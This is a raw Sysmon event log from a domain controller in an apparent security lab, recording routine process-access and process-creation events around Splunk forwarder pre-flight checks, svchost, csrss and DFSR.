15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C75-5FA1-4C00-000000008801}40444040C:\Windows\system32\cmd.exe{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.559{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7C75-5FA1-4C00-000000008801}4044C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4C00-000000008801}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4C00-000000008801}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.550{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C75-5FA1-4C00-000000008801}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.554{D28789B6-7C75-5FA1-4C00-000000008801}4044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.456{D28789B6-7C75-5FA1-4B00-000000008801}39043924C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.269{D28789B6-7C73-5FA1-3700-000000008801}30843480C:\Windows\system32\DFSRs.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 